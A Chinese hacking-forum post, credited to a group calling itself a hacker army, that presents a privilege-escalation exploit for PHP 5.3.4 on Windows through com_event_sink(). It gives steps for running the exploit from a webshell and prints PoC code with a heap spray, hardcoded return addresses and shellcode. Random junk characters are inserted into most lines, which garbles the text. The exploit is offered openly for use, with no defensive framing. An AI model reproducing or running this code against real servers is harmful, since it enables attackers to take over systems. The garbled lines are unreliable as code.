|
|
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
( C, ^ c8 Q" @6 {8 I
% J* K! E- N3 V. M测试方法如下:cmd /c x:\php\php.exe x:\test.php
" f' |; s9 B( P( X% r$ d b* Q
2 D% c Z( I% t5 c6 g' E- D下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
5 ~! ^( _" H) e这里是两个测试的截图:' e: w( G2 U Q8 t
2 L8 v# p4 {, T+ ~) m
2 s6 F: A! ]- V X+ P1 l" U
- f& Z7 K6 B7 U) D! O3 P! F+ n
, d" J, f1 }; V, |: o4 H' n
. l3 K! T7 z" t" C成功利用此漏洞的攻击者将获得系统的最高权限3 g. v7 E% q2 q2 s6 N
) f) ]8 L. U D I3 b( z" J: I! h) O" T# @, g6 p9 f, b9 p3 k: I
' n* G# J E/ F. w( X5 w
% G) E3 B) G( {8 g$ g& H1 j" X3 a
关于漏洞分析稍后附上。一下是PoC代码:/ w3 B" Q/ X% {$ g! ]
8 u0 o/ d& ]8 h9 k6 B
<?php: L7 j. S" t" T3 G7 d6 S
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞0 h8 S1 z: ^, V! ?) H
//$eip ="\x44\x43\x42\x41";
) G- X& H! q O4 E3 ]. Y* R3 |; Q4 w$eip= "\x4b\xe8\x57\x78";
. R% n7 b4 p3 I" {# o7 i$eax ="\x80\x01\x8d\x04";
* \7 b1 M8 s. J$deodrant="";
4 b# ^* P* a/ r1 L, A8 L$axespray = str_repeat($eip.$eax,0x80);
5 |) J" s9 f% h; n* {, K//048d0190: W: }- y% y/ g/ [: O# A( W
echo strlen($axespray);
; ^2 X/ D+ v- b4 P Eecho "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
, P* `$ v. v, u, a3 Gecho "Silic Group Hacker Army - BlackBap.Org";6 w, J3 O# O+ b D5 t5 b
//19200 ==4B32 4b00
; {5 X$ c( L+ Ofor($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
2 L: B0 s/ U' [# B8 D$terminate = "T";( I6 I: L4 f4 D# |& Y( T
$u[] =$deodrant;
. h8 o5 Q3 l2 k" t1 k$r[] =$deodrant.$terminate;
( ?- Z/ D. ?# r& C$ f* I0 A( J$a[] =$deodrant.$terminate;0 C6 U5 x; p/ ~/ M; w: M
$s[] =$deodrant.$terminate;
6 j: E: K+ m$ e//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的
/ l, o- ` r0 I( W0 j* F; u$vVar = new VARIANT(0x048d0000+180);
# D; T. }4 F( x/ X1 [//弹窗代码(Shellcode)" O8 \/ u5 k+ A- c+ u* {3 ?& N1 q
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";& ~: a6 |/ K* ^* y1 c
$var2 = new VARIANT(0x41414242);
# v; n; U; Y5 T: [com_event_sink($vVar,$var2,$buffer);
) W, S! ^# H/ {8 C( Q?>! U3 }" P+ O, D+ Y$ ]5 h
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|